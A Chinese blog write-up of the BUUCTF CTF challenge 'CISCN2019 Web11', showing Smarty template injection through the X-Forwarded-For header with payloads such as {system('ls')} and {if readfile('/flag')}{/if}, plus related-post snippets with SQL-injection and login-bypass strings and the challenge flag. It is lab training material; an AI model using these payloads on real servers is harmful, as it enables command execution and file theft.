web buuctf [CISCN2019 华东南赛区]Web11

已于 2022-04-07 23:51:12 修改
阅读量434 收藏 3
点赞数 2
文章标签: SSTIsmarty
于 2022-04-07 23:49:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/124029634
版权

知识点:1.SSTI(smarty模板)

2.XFF

1.开题:

 

a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系

b.提示xff

2.利用bp抓包,添加xff并尝试模板注入

很明显存在SSTI

3.改payload={system('ls')} 

 分别cat没有flag

猜测可能在目录下面

'cat ../../../flag'(前面有几个../需要挨个试一下)

flag{3941b25d-8279-47eb-acf6-6d7b8b6208fe}

ps:smarty模板也可以利用{if} 

      smarty中的{if}标签中可以执行php语句,{if readfile('/flag')}{/if}

半杯雨水敬过客
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
[CISCN2019 华东赛区]Web11
oubasangdadada的博客
03-02 1818
题目提醒Build With Smarty,猜测应该是smarty ssti,右上角显示了IP,猜测注入点应该再X-Forwarded-For 设置X-Forwarded-For为{7+7},在current ip 处回显14,确实在这里存在ssti 查阅smarty手册,发现{$smarty.version},返回版本信息3.1.30,这里smarty的版本是,${smarty.tem...
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2583
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
BUUCTF解题web十一道(02)
qq_45837896的博客
06-01 947
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
BUUCTF--WEB(11~20)
m0_59022585的博客
08-15 111
注入'uunionnion sselectelect 1,2,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema="geek")%23回显表为b4bsql和geekuser。令num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))获取flag。
BUUCTF [web专项11] [极客大挑战 2019]Http
yanglinchiji的博客
11-02 53
进入后直接查看源码,右拉发现有超链接直接点击进入会发现是页面源码,退出后手动输入secret.php提示要在这个网站上访问该php这个网址是肯定打不开的(试过了)猜测是需要修改包的数据通过检测直接用burp抓包添加一下访问地址又提示是Syclover这个浏览器修改一下 User-Agent发现需要本地访问,添加X-Forwarded-For出现flag。
BUUCTF解题web十一道
qq_45837896的博客
05-26 1195
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
BUUCTF-[CISCN2019 华东赛区]Web11
AndyNoel的博客
05-13 231
BUU-CTF[CISCN2019 华东赛区]Web11 页面最下端有提示Build with Smarty ! 确定页面使用的是Smarty模板引擎。输入{$smarty.version}就可以看到返回的smarty的版本号,该题目的Smarty版本是3.1。 但Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。 在页面右上角给出了IP,所以可以通过这里进行注入。 BurpSuite抓包,添加X-Forwarded-For: {if r
buuctf-[华东赛区]Web11
m0_62094846的博客
04-18 409
页面上没有很清楚的东西,抓包看看,会有IP地址的显示,但是网页中显示的API的URL由于环境的原因无法使用(API接口简单来说就是数据传输的一个通道),说明可能有XFF控制IP 尝试一下,确实是这样,那就可以通过XFF得到flag 传入{{7*7}}得到49,说明有SSIT漏洞,有关的语句格式可能会不一样。用的是Smarty模板引擎 一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号,3.1.30 (87条消息) PHP Smarty模版...
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1217
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
Web技术基础 华东科技大版 课件
08-05
该课件前3章讲解C#出步知识,第4章讲解HTML技术及简单运用,第5章至第15章讲解ASP.NET控件应用、ADO.NET与数据绑定、页面与代码分分离技术、JavaScript语言基础及对象简介、Ajax的Web初级应用
华东交通大学web课程设计报告,个人网站设计
07-08
华东交通大学web课程设计报告,个人网站设计。希望对你有帮助!
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
华东师范大学2019计算机考研839试卷及答案
华东师范大学2019 839.docx
06-25
华东师范大学计算机技术(085211)839 2019年真题回忆版以及答案
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
BUUCTF之[CISCN2019 华东赛区]Web11 ------ SSTI注入
weixin_44632787的博客
06-23 1478
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTIsmarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-F
BUUCTF [CISCN2019 华东赛区]Web11
qq_56313338的博客
08-15 130
X-Forwarded-For 是一个 HTTP 扩展头部,用来描述请求者的ip。如果后端认为这个是我们的真实ip并使用Smarty来回显那么就可能造成了SSTI。看到这个ip我们应该想到使用X-Forwarded-For字段。这里响应后你看到应该是空的,ctrl + u 查看源代码。时 IP会先为2,那么说明了此处就是有SSTI漏洞。上面可以看出这是Smarty模板引擎。
练[CISCN2019 华东赛区]Web11
m0_66225311的博客
10-01 139
​ IP地址的Smarty模板注入
华东师范大学数理统计pdf
最新发布
12-08
华东师范大学数理统计pdf是一份关于该大学数理统计学科的电子文档,其内容涵盖了该学科的理论知识、研究成果和应用方向等。这份pdf文档很可能是华东师范大学数理统计学科相关的教材、学术论文集、研究报告或者课程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值